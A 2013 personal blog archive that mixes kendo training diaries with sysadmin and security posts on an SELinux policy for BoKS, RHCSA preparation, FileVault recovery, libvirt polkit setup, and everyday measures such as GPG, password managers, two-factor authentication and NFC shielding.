Good news about my sports injury: I went to see a physiotherapist and he agrees with the previous assessment that nothing's actually damaged in my knee. The theory remains as before: I twisted my knee "in a bad way" during kendo and something got pinched. That something is probably my meniscus, a cartilage-like layer that sits inside the knee joint. 

In knee injuries you'll often see tearing of the meniscus, which will result in permanent pain and will need to be operated on. That's not the case with me and the doctors think it merely got pinched or hurt. Now, whenever I get pains, that's because the meniscus is being stressed in that same spot. Doc says the pain could go away completely within a few months, or that it could be permanent. It's not dangerous, just annoying. The best way to avoid the pains is to take a good, hard look at my technique in kendo. 


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Kendo waza explained

2013-10-04 22:04:00

Disclaimer: this article was written by a mudansha, for other mudansha. While I have learned a lot the past few years, I am by no means a kendo expert.

To many beginning kendoka, the many different waza we practice can become confusing. Good kihon is where it’s at of course, but if you’re asked to practice men-suriage-men, then you’d better know your suriage-men! I’ve always loved this particular explanation at Kendo Guide because of its simple summary of kendo techniques. Their picture gives an easy overview of the most important techniques.

The initial division of techniques is into shikake waza and oji waza, respectively offensive and countering techniques. It’s a matter of initiative: who moves first. The Kendo Guide image can be summarized in the following table.

 

shikake (仕掛け)     | oji (応じ)
renzoku waza (連続)  | nuki waza (抜き)
harai waza (払い)    | suriage waza (刷り上げ)
debana waza (出鼻)   | kaeshi waza (返し)
hiki waza (引き)     | uchiotoshi waza (撃落シ)
katsugi waza (担ぐ)  |
maki waza (巻き)     |

 

The Kendo Guide article does a good job of explaining most of these techniques, but I thought we could add upon that. For example…

 

Nuki versus debana

What’s the difference between a nuki kote and a debana kote? On the floor, during keiko, they may feel the same to most beginners. They see sensei square up against a victim, the victim does an attack and sensei whacks him before the attack lands.

The table above should make the biggest difference clear: timing. Nuki kote, or more famously nuki dou, is performed by evading a strike that is already on its way to you. Debana kote and so on are done before your opponent has even started attacking. Right before he attacks, you do. It’s a matter of sen (先), from “sen wo toru“, “to anticipate“.

Where debana waza are “sen no sen” (先の先), nuki waza are “go no sen” (後の先). With the former you sense that your opponent is going to act and you counteract at the same time. With the latter you can still prevent your opponent’s action from succeeding by blocking and then attacking. Ai-men is also “sen no sen“. Many great teachers have written about the concept of sen, so I will leave it as an exercise for you to read up on the topic. Kendo World magazine has had a few articles on the concept and Salmon-sensei has also written about it.

The remaining oji waza are all “go no sen“: suriage, kaeshi and uchiotoshi. Which brings us to…

 

Kaeshi versus suriage

To many beginners, including myself, kaeshi waza and suriage waza can look very much alike in demonstrations: sensei faces his opponent, opponent attacks, sensei whacks the shinai out of the way and then counter-attacks. But as before, these techniques are very different despite both being of the “go no sen” persuasion.

Kaeshi waza are demonstrated in kata #4, where shidachi catches uchidachi’s bokken and slides it away along his own bokken with a twist of the wrists. The counter attack is then made from the wrists as well. Suriage technique on the other hand is shown in kata #5 where shidachi counter attacks uchidachi, hitting the bokken out of the way on the upswing. In suriage techniques your own shinai stays on the center line, it does not move sideways.

But wait…

 

Suriage versus harai

Ivan stumbled upon this matter back in 2006: if both suriage and harai waza move your opponent’s shinai out of the way in an upwards or sideways motion, what’s the difference? Well, for starters there is timing: harai waza is shikake waza where you take the initiative, while suriage waza is oji waza i.e. reactive.

In suriage waza, your opponent’s shinai is caught by your upswing straight through the centerline. It is then moved aside by the curvature and the movement of your own shinai, as a setup of your own attack. In harai waza, you hit your opponent’s shinai upwards or downwards out of the way, before starting your own attack.

 

Seme versus osae versus harai

In all three cases you will see the attacker step in, while the defending shinai disappears off to the side. It’s just that the way in which the shinai moves aside is very different.

In seme waza it is your indomitable spirit that makes your opponent’s kamae collapse: you move in strongly and he is overwhelmed. That, or you misdirect his attention by putting force on one target, while truly attacking a second target. In osae waza (“pinning techniques“, like in judo) you hold your opponent’s shinai down and prevent it from moving effectively by moving your shinai over it, coming from the side. It is not a strike, push or shove! You’re merely holding him down. Finally, with harai waza, you make a small and strong strike against your opponent’s shinai, thus smacking it out of center. This may be done in either direction, left/right, up/down, whichever is more useful to you.

 

One more sen: sen sen no sen

There are three forms of initiative: go no sen (block and act), sen no sen (act simultaneously) and sen sen no sen (act preemptively). All shikake waza, aside from debana, are classed as sen sen no sen: you are acting before your opponent does.

In other budo which traditionally subscribe to a non-antagonistic approach, sen sen no sen is described not as an act of aggression, but as ensuring that your opponent does not get the chance to attack you. Your opponent has already made up his mind to fully attack you, but he has not started yet. And by using sen sen no sen, you are not letting him. For example: an analysis through aikido and an explanation through karate.

 

A graphical summary

Based on all of the preceding, I have come to a new graphical representation of kendo waza. Below are a Venn diagram and a table that show the most important waza and their various characteristics.

Here is a poster of these graphics, that can be printed for the dojo.

 

The leftovers, what hasn’t been discussed yet

I’m told there are more techniques. Maybe we’ll learn about them some day :)

 

Closing words

To end this essay, I would like to quote Salmon-sensei:

The one thing that I am sure was obvious to most people is that in kendo, as in the rest of life, you have to “make it happen”. Shikake waza does not work unless you break your opponents centre and oji waza is effective only if you control your opponents timing and pull him into your counter attack.

We are reminded of this in class, if not every week! Whatever you do, you need to take an active role in it. Simply waiting does not work!

I would like to thank both Heeren-sensei and Salmon-sensei for their explanations through email. They helped me a lot in figuring this stuff out.


kilala.nl tags: , ,

View or add comments (curr. 0)

Running BoKS on SELinux protected servers

2013-10-01 09:00:00

I have moved the project files into GITHub, over here

FoxT Server Control (aka BoKS) is a product that has grown organically over the past two decades. Since its inception in the late nineties it has come to support many different platforms, including a few Linux versions. These days, most Linuxen support something called SELinux: Security-Enhanced Linux. To quote Wikipedia:

"Security-Enhanced Linux (SELinux) is a Linux kernel security module that provides the mechanism for supporting access control security policies, including United States Department of Defense-style mandatory access controls (MAC). It is a set of kernel modifications and user-space tools that can be added to various Linux distributions. Its architecture strives to separate enforcement of security decisions from the security policy itself and streamlines the volume of software charged with security policy enforcement.

Basically, SELinux allows you to very strictly define which files and resources can be accessed under which conditions. It also has a reputation of growing very complicated, very fast. Luckily there are resources like Dan Walsh's excellent blog and the presentation "SELinux for mere mortals".

Because BoKS is a rather complex piece of software, with dozens of binaries and daemons all working together across many different resources, integrating BoKS into SELinux is very difficult. Thus it hasn't been undertaken yet, and thus BoKS not only requires running outside of SELinux's control, it actually wants the software fully disabled. So basically you're disabling one security product, so you can run another product that protects other parts of your network. Not so nice, no?

So I've decided to give it a shot! I'm making an SELinux ruleset that will allow the BoKS client software to operate fully, in order to protect a system alongside SELinux. BoKS replicas and master servers are even more complex, so hopefully those will follow later on. 

I've already made good progress, but there's a lot of work remaining to be done. For now I'm working on a trial-and-error basis, adding rules as they are needed. I'm foregoing the use of sealert for now, as I didn't like the rules it was suggesting. Sure, my method is slower, but at least we'll keep things tidy :)
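
To give an idea of what goes into such a file, here is a purely illustrative sketch in the style of a refpolicy module. The type names and rules below are made up for this example and are not taken from the actual boks.te.

  policy_module(boks, 0.65)

  # Illustrative only: these types and rules are not the real BoKS policy,
  # they just show the general shape of a type-enforcement module.
  type boks_t;
  type boks_exec_t;
  init_daemon_domain(boks_t, boks_exec_t)

  type boks_etc_t;
  files_type(boks_etc_t)

  # Let the (hypothetical) BoKS daemon domain read its own configuration files.
  allow boks_t boks_etc_t:file read_file_perms;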

Over the past few weeks I've been steadily expanding the boks.te file (TE = Type Enforcement, the actual rules):

v0.32 = 466 lines
v0.34 = 423 lines
v0.47 = 631 lines
v0.52 = 661 lines 
v0.60 = 722 lines 
v0.65 = 900+ lines 

Once I have a working version of the boks.te file for the BoKS client, I will post it here. Updates will also be posted on this page.

 

Update 01/10/2013:

Looks like I've got a nominally working version of the BoKS policy ready. The basic tests that I've been performing are working now; however, there's still plenty to do. For starters I'll try to get my hands on automated testing scripts, to run my test domain through its paces. BoKS needs to be triggered into just about every action it can perform, to ensure that the policy is complete.

 

Update 19/10/2013:

Now that I have an SELinux module that will allow BoKS to boot up and to run in a vanilla environment, I'm ready to show it to the world. Right now I've reached a point where I can no longer work on it by myself and I will need help. My dev and test environment is very limited, both in scale and capabilities and thus I can not test every single feature of BoKS with this module. 

I have already submitted the current version of the module to FoxT, to see what they think. They are also working on a suite of test scripts and tools, that will allow one to automatically run BoKS through its paces which will speed up testing tremendously. 

I would like to remind you that this SELinux module is an experiment and that it is made available as-is. It is absolutely not production-ready and should not be used to run BoKS systems in a live environment. While most of BoKS' basic functions have been tested and verified to work, there are still many features that I cannot test in my current dev environment. I am only running a vanilla BoKS domain. No LDAP servers, no Kerberos, no other fancy features. 

Most of the rules in this file were built by using the various SELinux troubleshooting tools, determining what access needs to be opened up. I've done it all manually, to ensure that we're not opening up too much. So yeah: trial and error. Lots of it. 

This code is made available under the Creative Commons - Attribution-ShareAlike license. See here for full details. You are free to Share (to copy, distribute and transmit the work), to Remix (to adapt the work) and to make commercial use of the work under the following conditions:

So. How to proceed? 

  1. Build a dev/test environment of your own. I'm running CentOS VMs using Parallels Desktop on my Macbook. Ensure that they're all up to date and that you include SELinux with the install. Better yet, check the requirements on this page.
  2. I've got a BoKS master, replica and client, all version 6.7. However, installing BoKS on CentOS is a bit tricky and requires a few workarounds.
  3. Download the BoKS SELinux module files
  4. Put them in a working directory, together with a copy of the Makefile from /usr/share/selinux/devel/
  5. Run: make. If you use the files from my download, it should compile without errors. 
  6. Run: semodule -i boks. The first time that you're building the policy you'll need to install the module (-i). After that, with each recompile you will need -u, for update. 
  7. Run: touch /.autorelabel. Then reboot. Your system will change all the BoKS files to their newly defined SELinux types. 
  8. Run: setenforce 1. Then get testing! Start poking around BoKS and check /var/log/audit/audit.log for any AVC messages that say something's getting blocked; see the sketch below.
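
A quick way to spot those denials while testing, assuming the standard audit tooling is installed:

  # Show recent AVC denials after exercising a BoKS feature:
  ausearch -m avc -ts recent
  # Or keep an eye on the raw log while you work:
  tail -f /var/log/audit/audit.log | grep AVC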

I'd love to discuss the workings of the module with you and would also very much appreciate working together with some other people to improve on all of this. 

 

Update 05/11/2014:

Henrik Skoog from Sweden contacted me to submit a bugfix. I'd forgotten to require one important thing in the boks.te file. That's been fixed. Thanks Henrik!

 

Update 11/11/2014:

I have moved the project files into GITHub, over here


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Kendo practice: intense and awesome

2013-09-11 07:25:00

 

The past few weeks have been pretty intensive! Aside from the fact that I need to take a few days off from kendo these weeks (birthdays and such), it's been hard work. Awesome, hard work. They're working us hard in both Almere and in Amstelveen.

Yesterday's class in Amstelveen again put focus on te-no-uchi training and the left hand. After the usual suburi and warming-up, we were again instructed to practice men strikes with motodachi. Five repetitions of fifty shomen, followed by two repetitions of thirty double shomen. Heeren-sensei reminded us that it's not just an exercise to make our arms tired, but that we're really here to practice our left hand. Like before:

When it comes to breathing, don't try to stick to a rhythm of in-and-out breathing that attempts to match your striking pattern. Instead, take a deep breath and keep on breathing out until there's no more. Then breathe in again. Heeren-sensei always tries to get in as many strikes with one breath as possible. 

We were all reminded that breathing should not be done "high" in the lungs, but "low" and from the "hara". In both Japanese and Chinese arts, the "hara" (or the "lower dantian", 下丹田) is said to be the seat of your energy and to be the physical center of gravity of your body. (more here) By breathing from the hara one ensures at least two things:

  1. You are regulating your breathing and getting enough oxygen without hyperventilating.
  2. You are building force in both your body and your kiai/kakegoe.

A way to check that you're breathing right is to tie your hakama himo pretty tightly around the hara, which ensures that you feel your hakama tightening when breathing in. A very clear difference was presented between a "high" and a "low" kakegoe. The one produced from the hara was louder and more solid, rolling right over your opponent.

Our left-hand training continued after seiza, with kirikaeshi interval training and normal kirikaeshi after jigeiko. In both exercises we were told to pay close attention to aite's left hand. It should not be going sideways or wide, but through the center line. "Helicoptering" should be avoided at all costs. Even in kirikaeshi, strikes will be straight for the most part only swerving left or right close to the end. If you feel that aite's left hand is straying, drop your shinai so he will hit your men thus alerting him of the problem.

Twenty minutes of jigeiko were had. Heeren-sensei impressed upon us the importance of practicing the lessons from kihon keiko in jigeiko.

In my case I fought three people and I am happy to see my stamina returning. I did not need to sit down between bouts, but only took a short one minute breather. I feel confident about all three rounds, against Miyahara-sensei, Zicarlo-sempai and Raoul-sempai. With Raoul I took on a student role, letting him coach and warn me extensively regarding my posture and about tension in my muscles. With Machi and Zicarlo, I took a more competitive approach which turned out very well. I tried to maintain a strong kamae and looked them both squarely in the eyes (attempting enzan no metsuke). Whenever I attacked, I tried to stick to the basics: kote-men, oki-men and hayai-men. I also did many hiki-men against Zicarlo. I'm very happy that he congratulated me on my jigeiko, remarking "You don't attack often, but when you do it's good and tidy!" I'm glad that my men strikes often hit the datotsubui.

Recently, Marli has been pressing me to attempt my shodan grading. I've been holding off on that, mostly because of insecurity. I think that, as shodan, one has an exemplary role and I feel that I cannot set a proper example if I have to keep bowing out due to exhaustion. Then again, both Heeren-sensei and Jeroen-sempai reminded me that everyone can tell I'm putting in my best effort and that I keep going despite my exhaustion. Combining all of that with Marli's continued super support and yesterday's class, I now feel more confident about attempting the December grading. I'll have a chat with the NKR people to see if I've met the conditions.

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Start of the new kendo season

2013-08-28 06:12:00

Last week saw the start of the 2013/14 kendo season at Renshinjuku dojo. I'm very happy that Heeren-sensei is joining us again after his prolonged absence. On the other hand, I still haven't seen any of the other teachers, including Tsuyuguchi-sensei. As of yesterday we have moved to our new training hall at Jane Addamslaan, now that the Westend hall is getting decommissioned. 

The first two classes of the season were spent on rebuilding our physical condition after a few weeks of slacking off* and on improving tenouchi (手の内, lit. "the inside of your hand"). Tenouchi is the term used to describe a specific kind of grip or movement, made using your hands and wrists at the moment when a strike connects. Geoff Salmon-sensei has written a lot about it.

Heeren-sensei reminded us of the importance of training at home. Once or twice a week in the dojo isn't enough if you want to make real progress! Doing suburi will keep you agile and will help with tenouchi. And making a striking dummy will even let you do basic kihon practice! You can even do suburi inside, by making a suburito from old shinai parts.

After the usual warmup routine, we proceeded to bogu-less exercises. Motodachi receives and counts men strikes on his shinai, which is held in front of his face. Each person needs to do fifty strikes, totaled up to 150 by rotating three times. Last week we also included two times fifty hayai suburi. Heeren-sensei asked us to do these exercises with three things in mind:

  1. The upswing reaches all the way back, tapping your rear.
  2. The upswing has your left hand passing right over your head, almost combing through your hair.
  3. The strike should be made strongly, focusing on the left hand.

These three factors combined help you train tenouchi.

For similar reason we then proceed to interval training, with each couple doing kirikaeshi all 'round the perimeter of the dojo floor. Each person needs to make a minimum of four rounds. Heeren-sensei pointed out the following:

Class is finished with 10-15 minutes of free jigeiko and kirikaeshi.

*: In my case that's three months due to my knee injury. After visiting my GP I stopped kendo a month early. Despite the doctor's expectations it took more than two weeks to get rid of all the pains. More like six to eight. After that the pain was gone, but reappeared after last week's class. I've now bought a knee brace, which appears to be helping a lot. I still need to have a checkup by a physio-therapist.


kilala.nl tags: , ,

View or add comments (curr. 0)

Installing CentOS Linux as default OS on a Macbook

2013-08-12 16:46:00

While preparing for my RHCSA exams, I was in dire need of a Linux playground. At first I could make do with virtual machines running inside Parallels Workstation on my Macbook. But in order to use Michael Jang's practice exams I really needed to run Linux as the main OS (the tests require KVM virtualization). I tried and I tried and I tried but CentOS refused to boot, mostly ending up on the grey Tux / penguin screen of rEFIt

On my final attempt I managed to get it running. I started off with this set of instructions, which got me most of the way. Even after resyncing the partition table through rEFIt's menu, the rEFIt boot menu would still send me to the grey penguin screen. But then I found this page! It turns out that rEFIt is only needed in order to tell EFI about the Linux boot partition! Booting is then done using the normal Apple boot loader!

Just hold down the ALT button after powering up and then choose the disk labeled "Windows". And presto! It works, CentOS boots up just fine. You can simply set it as the default boot disk, provided that you left OS X on there as well (by using the Boot Disk Selector).


kilala.nl tags: , , , ,

View or add comments (curr. 0)

RHCSA achieved

2013-08-12 16:23:00

Huzzah! As I'd hoped, I passed my RHCSA examination this morning. Not only is this a sign that I'm learning good things about Linux, but it also puts me 100% in the green for my continued CISSP-hood: 101 points in domain A and 62 in domain B: 163/120 required points.

I can't be very specific about the examination due to the NDAs, but I can tell a little bit about my personal experience. 

The testing center in Utrecht was pleasant. It's close to the highway and easily accessible because it's not in the middle of town. The amenities are modern and customer-friendly. The testing room itself is decent and the kiosk setup is exactly as shown in Red Hat videos. Personally, I am very happy that RH started with the kiosk exams because of the flexibility it offers. With this new method, you can sit for RHCSA/RHCE/etc almost every day, instead of being bound to a specifc date. 

The kiosk exam comes with continuous, online proctoring, meaning that you're not stuck if something goes wrong. In a normal exam situation you'd be able to flag down a proctor and in this case you can simply type in the chatbox to get help. And I did need it on two occasions because something was broken on the RH side. The online support crew was very helpful and quick to react! They helped me out wonderfully!

I prepared for the test by using two of Michael Jang's books: the RHCSA/RHCE study guide and the RHCSA/RHCE practice exams. If you decide to get those books, I suggest you do NOT go for the e-books because the physical books include DVDs with practice materials. Without going into details of the exams, I found that Jang's books provided me ample preparation for the test. However, it certainly helps to do further investigation on your own, for those subjects that you're not yet familiar with. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Security measures all of us can take - part 3

2013-08-10 22:53:00

Here's another follow-up with regards to security matters I believe everybody should know. It's a short one: Email is not safe.

It has been said that you "don't put anything in an email that you wouldn't want to see on the evening news." It's not even a matter of the NSA/FBI/KGB/superspies. Email really is akin to writing something on a postcard: it's legible to anyone who can get his hands on it. And like with the postal service, many people can get their hands on your email. 

Here is an excellent and long read on the many issues with email. But to sum it up:

  1. In general, emails are transferred and stored unencrypted. Anyone on the same network as you can read them in passing. Anyone managing an email server can read the mails stored on them.
  2. Source/sender information is easily spoofed. There is no way to guarantee that an email actually came from whoever's name is at the top. 

These two problems can be worked around in a few rather technical ways, most of which are not very user-friendly. The most important one is to use GPG/PGP, which allows you to encrypt (problem 1) and to digitally sign (problem 2) the emails that you send. It certainly helps, but it introduces a new problem: key exchange. You now need to swap encryption keys with all people with whom you'll want to swap emails. But at least it's something.
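To give an idea of what that looks like in practice, here is a minimal GnuPG sketch on the command line; the key file and email address are made up for the example:

$ gpg --gen-key                                                  # create your own keypair, once
$ gpg --import tess-public-key.asc                               # import your correspondent's public key
$ gpg --armor --encrypt --sign -r tess@example.org message.txt   # addresses problems 1 and 2
$ gpg --decrypt message.txt.asc                                  # recipient decrypts and verifies the signature

The hard part isn't the tooling, it's getting both parties to exchange and trust each other's keys in the first place.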

In the meantime:

Want to send me an encrypted email? Here's my public key :)


kilala.nl tags: , ,

View or add comments (curr. 0)

An update on certifications

2013-08-07 22:09:00

Here's a follow-up post to last year's "Confessions of a CISSP slacker".

By the end of last year I was woefully behind on my CPE (continuing professional education) requirements, which are needed to retain my CISSP certification. Not only is CISSP a darn hard exam to take, but ISC2 also needs you to garner a minimum of 120 study points every three years. In my first two years I didn't put in much effort, meaning I had a trickle of 51 points out of 120. Hence my emergency plan for making it to 120+ points in the span of a year.

All the calculations were made in the linked article and then I set things into motion. With my resolve strengthened by my personal coach, I put together a plan for 2013 that would ensure my success. And my hard work has been paying off: as of tonight I have achieved the first milestone, the minimum of 80 points in "domain A" (screenshot above).

The heaviest hitters in obtaining these 29 points are:

The remaining points were garnered by attending online seminars and by perusing a number of issues of InfoSecurity Professional magazine.

Next Monday I'm scheduled to take my RHCSA (Red Hat Certified System Administrator) exam. I've been working hard the past three months and I'm confident that I'll pass the practical exam on my first go. If I do, that's a HUGE load of CPE because all the study time counts towards my CISSP. That would be roughly 20 hours in domain A (security-related) and 60 hours in domain B (generic professional education). And that, my friend, would put me squarely over my minimal requirements! And I haven't even finished all the items on my wishlist :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Public and private parts of this site

2013-07-24 23:38:00

As I wrote earlier I have decided to clamp down on what is publicly published about our lives. This means that >80% of my blog has been turned into a private affair, with only work-related materials still being available to the whole world.

Now that my Macbook has crashed and I need to spend a lot of time waiting for the backups to restore, I have spent roughly eight hours updating my CMS code. It was an interesting learning experience and now this site has a basic login/logout functionality. Logging in will simply let you see the website in all of its original glory.

If I haven't contacted you yet about a username+password and you'd like one, drop me an email.


kilala.nl tags: , , ,

View or add comments (curr. 0)

When FileVault2 fails, it fails hard

2013-07-23 20:54:00

mac os x boot no access screen

For quite a while now I've had my Macbook's boot drive protected using Apple's full-disk encryption, called FileVault2. I've been very pleased with the overall experience and with the fact that the performance hit wasn't too big. All in all it's a nice tool. 

But today I learned that when (if) FileVault2 fails, it fails hard.

I was on the train to work, fiddling with my Linux VMs and the virtual NICs. Since something wasn't working right, I reckoned I'd reboot the whole laptop and see if that wouldn't clear things up. Heck, my last reboot was at least 20 days ago, so why not?

Well, turns out that my Macbook wouldn't boot anymore. After entering my FileVault password the system would attempt to boot, halting at the "no access" symbol. Not good.

Basically, the boot loader's working and the part that knows my FileVault passwords was also okay. However, poking around with diskutil on the command line quickly showed that the CoreStorage config for my boot drive had gotten corrupted. It showed disk0s2 as being a CoreStorage physical volume, but this was also listed as "failed". There were no logical volumes to be found. Ouchie. This was confirmed by using the diskutil GUI, which greyed out the option to open the encrypted volume.
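For reference, this is roughly the kind of poking around I mean; a minimal sketch of the diskutil CoreStorage commands involved, with the UUIDs being placeholders you'd copy from the list output:

$ diskutil cs list                         # show CoreStorage logical volume groups and their status
$ diskutil cs unlockVolume <LV-UUID>       # worth a try, if a logical volume still exists
$ diskutil cs delete <LVG-UUID>            # last resort: remove the failed volume group (destroys the data)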

The only recourse: to delete the failed volume group and to start anew. I'm restoring my backup image as I write this, after which I'll be restoring my homedir through Time Machine, as before. I'm aware that both FileVault and Time Machine can be a bit flaky, so I'm very lucky that they haven't failed on me simultaneously.

This is all highly ironic, as my Macbook died only a few days before the arrival of my newly ordered Macbook Air. *groan* Now I'm spending a few hours recovering a laptop, which I'll only be using for four more days. Ah well.

This is again a gentle reminder to all you readers to make proper backups. In my case I'm lucky to only lose a few weeks worth of tweaking my Parallels virtual machines, as I chose not to include those with my Time Machine backups (they'd backup multiple gigs every hour). 


kilala.nl tags: , , ,

View or add comments (curr. 0)

KVM, libvirt, polkit-1 and remote management

2013-07-16 22:00:00

With Red Hat's default virtualization software KVM, it's possible to remotely manage the virtual machines running on a system. See here for some regular 'virt-ception'.

Out of the box, libvirt will NOT allow remote management of its VMs. If you would like to run a virt-manager connection through SSH, you will need to play around with Polkit-1. There is decent documentation available for the configuration of libvirt and Polkit-1, but I thought I'd provide the briefest of summaries.

Go into /etc/polkit-1/localauthority/50-local.d and create a file called (for example) 10.libvirt-remote.pkla. This file should contain the following entries:

[libvirt Remote Management Access]
Identity=unix-group:libvirt
Action=org.libvirt.unix.manage
ResultAny=yes
ResultInactive=yes
ResultActive=yes

This setup will allow anyone with (secondary) group "libvirt" to manage VMs remotely. That's a nice option to put into your standard build!
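To sanity-check it from another machine, something along these lines should do; the hostname and username are made up for the example:

$ sudo usermod -a -G libvirt tess                        # on the KVM host: add the user to the libvirt group
$ virsh -c qemu+ssh://tess@kvmhost/system list --all     # from your workstation: list all VMs over SSH
$ virt-manager -c qemu+ssh://tess@kvmhost/system         # or attach the graphical manager remotely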


kilala.nl tags: , , ,

View or add comments (curr. 0)

Security measures all of us can take - part 2

2013-07-14 23:28:00

As a follow-up to my previous post on common sense I'd like to touch on Internet privacy. 

A few months ago I decided it was time to clean up my presence in social media. Using various plugins and with a lot of patience I managed to clear out every post I had ever made to Facebook, Google Plus and Reddit. This decision followed one-too-many privacy changes on Facebook and the realization that despite my best intentions I was still sharing a lot of information. I now regularly go over all of my social profiles to ensure nothing is "leaking out", as all parties involved have proven not to care too much about your privacy.

What's more, is that I've come to reconsider my online profile. You know how we warn our kids never to give out their real names on the Internet? Or their address and whatnot? Isn't it ironic then, that I've been doing just that for well over a decade? Not only that, but I've kept a pretty detailed diary and have interacted with thousands of people through dozens of forums. I've used the same alias in all of those places, making myself very identifiable. 

Better late than never, but I've finally come to the decision to try and break down that online persona as well as possible. Wherever I can I've taken to changing my usernames and identifiers. That's one hint for people: don't use the same name everywhere.

A second point: on many forums it's not possible to delete all the posts you made. Most forums are of the opinion that providing an option to delete one's whole history is detrimental to both the discussions and to the content of their site. And of course they're right. So if you want to start culling posts you will either need to be selective and pick the worst stuff, or you'll spend hours upon hours manually deleting each and every post you made. Luckily there are tools to help you out, like Greasemonkey scripts that can automate browser tasks: to delete Reddit comments, or to clean your Facebook timeline. They're not foolproof, but they help.

Remember: just about everything on the Internet is forever. If it's not people making copies of your photos or text, it's companies! The famous Internet wayback machine regularly snapshots whole websites for posterity. And sites like Topsy.com shamelessly take your whole Facebook/Google+/Twitter feed and retain fully searchable copies on their own website. 

It's been said before and it'll be often repeated: think about what you post and to whom you make it available. Review your privacy settings on social media frequently and think hard if you want something to be shared across the globe. 

That's why I've decided to dedicate the public version of this website to my professional activities: work, programming, learning. All of the other things will be passworded and only available to myself and my family.


kilala.nl tags: , ,

View or add comments (curr. 0)

Finishing the 2012/13 season early

2013-06-16 10:35:00

Ever since the 04/28 Centrale Training my right knee has been giving me trouble. Sharp pains below the disc, probably where a bunch of muscles connect, occur whenever I walk stairs or when I rotate my leg. 

Aside from having to see a doc, I've decided to finish the 2012/13 season a bit early. My knee needs rest. I'll still be attending class for the last few weeks of the year, but only for mitori geiko, for social contacts and to help out with shinai maintenance etc. That's exactly what I did yesterday: I fixed six shinai, had a short chat with a few people and helped out Kris-fukushou here and there.


kilala.nl tags: , ,

View or add comments (curr. 2)

Security measures all of us can take

2013-06-10 16:47:00

Recently I've been on a bit of a security-binge at home. This blog post may have been tagged as "geeky", but as the title says I'll be going over a few things all of us should be familiar with. At least, that's my opinion... These days you're taking risks if you don't use these measures.

1. NFC security

Per this week, ING Bank are providing customers with NFC equipped debit cards. It's not optional, it's in every single card. NFC, Near Field Communication, is a technical term for what most of us will know as "contactless transactions": the chip card used in Dutch public transport, or the ICOCA/Pasmo/Suica cards from Japan. In ING's case, this means that your debit card can now be used for payments, simply by holding your card close to a payment terminal. Payments under €25 will not require authentication using a PIN and payments are charged directly to your account. It is not a charge card, like Suica or OV Chip.

Because NFC will be featured in more and more products, now is the time to start thinking about securing your cards. Your bank card, your credit card (Visa also has NFC), your public transport card and of course also the access cards for the office! While many parties tout an effective range of 2-4cm for NFC, in actuality there have been many test cases where NFC cards were activated over ranges from 30cm to several meters.

I'm calling it right now: the buzzword for 2014/2015 will be "crowd skimming".

crowd skimming nfc rfid clone steal

Miscreants will simply hide an NFC skimmer in a backpack and start walking through busy crowds. Imagine how many cards could be copied, or transactions could be made by walking around a train station or a music festival!

Protection is easy and I'm sure that by 2024 most wallets sold will come with this feature: shielding. There are many DIY projects online for aluminum-lined wallets, but they're also for sale. DIFRWear is a famous example, as is the Dutch-designed Secrid. Instead of spending €25-€50, I got a Safe Wallet from Marskramer at a low €2,99 (free shipping)!

2. Passwords

Everyone's heard it before: "don't use simple passwords!"

Make your password hard to guess, don't use the same password for multiple accounts, change your passwords regularly. Most people know these rules (best practices?), but many don't adhere to them. And I understand! They're a hassle! Every few months I need to manually visit over fifty websites to change passwords and it's a pain. But that doesn't mean you shouldn't do it!

Luckily password managers will make life a lot easier for you. There are many to choose from and I went with 1Password. At its most basic, 1Password becomes your safe storehouse for all your passwords (and other confidential information). But where it shines is its browser integration, which allows you to log in to your websites automatically. For example, I visit Facebook.com and ask 1Password to log in for me, which it does. Done!

The great thing about this, is that it makes complex passwords effortless for you! Have a hard time remembering a sixteen character, random string of letters and numbers? You won't need to, because 1Password fills it out for you. And access to your password vault is obviously protected by one very strong password, hence the name of the product :)

If you'd like to take your passwords with you on the road, for use on another computer, then 1Password can provide you with a smartphone app for iOS or Android. You'll always have all your passwords with you, safely encrypted and protected.

EDIT: The newly announced iCloud Keychain will be another good option for Mac OS users. And of course KeePass is cross-platform and free. Also, be sure to check out the different managers as some are not without issues.

3. Multi-factor authentication

The problem with username-password authentication is that in many cases your username is plainly obvious. Often it's your email address, some permutation of your name or a nickname that's out in the open. That leaves only your password as the true secret and as was discussed at #2, often it's not a very good secret to begin with!

One solution to this problem is to add another factor to the authentication step. Next to using something that you know (name and password) you'll often see the use of something that you have, like an OTP token.

Many websites will allow you to enable two-factor, or multi-factor authentication. E-Banking sites have historically used random number generating tokens, or "calculators". But these days it's becoming common for more and more sites and applications. Facebook, LinkedIn, Google, Wordpress, Evernote, all of them let you use a smartphone app or they'll send you an SMS with a one-time code. Thus your smartphone becomes the "something you have" factor, which will generate codes for you. 

Personally, I've come to use Google Authenticator for many of my accounts. It's free and it's open source. Best of all: while it may be Google in name it does NOT run on Google servers. It's 100% between your phone/PC and the account in question. Google Authenticator is wonderfully flexible, insofar that it can be integrated with any service you can think of. Obviously it's being used by websites, but it can also be integrated into applications (like Evernote) and into PAM-compatible Unix services so you can use it for your SSH logins.
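As an illustration of that last point, here's a minimal sketch of wiring it into SSH logins on a Linux box, assuming the Google Authenticator PAM module is installed (package names differ per distribution):

$ google-authenticator                    # run once as the user: generates the secret and emergency scratch codes
$ sudo sh -c 'echo "auth required pam_google_authenticator.so" >> /etc/pam.d/sshd'
                                          # then set ChallengeResponseAuthentication yes in /etc/ssh/sshd_config
$ sudo service sshd restart               # restart SSH so it starts asking for the one-time code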

4. Whole disk encryption

Most of us don't give much thought to all the data stored on our computers, but to be honest: for most of us our whole lives are on there. Emails, documents, photographs and plenty of secrets. Bank details, credit card numbers, passwords and confidential data. Is it really a smart idea to leave that stuff unprotected, to be read by anyone willing to steal your stuff? No.

That's where whole-disk encryption comes in. This solution renders your whole hard drive unreadable, unless you have the password. Your computer won't boot, nor can anyone go through your files, without the password. In this day and age most computers are also fast enough for you not to notice any real slowdown thanks to the encryption.

There are plenty of commercial products available, but there's also free stuff out there. TrueCrypt is free and open source and is cross-platform (Windows, Linux, Mac OS X). BitLocker is included with some versions of Windows and FileVault comes standard with every Macintosh since Lion / 10.7. 
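On a Mac running 10.8 or later, FileVault 2 can reportedly even be switched on from the command line with fdesetup; a minimal sketch (on Lion you're limited to the System Preferences route):

$ sudo fdesetup enable      # turns on FileVault 2 and prints a recovery key -- store that somewhere safe
$ fdesetup status           # check whether encryption is enabled or still in progress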

EDIT:

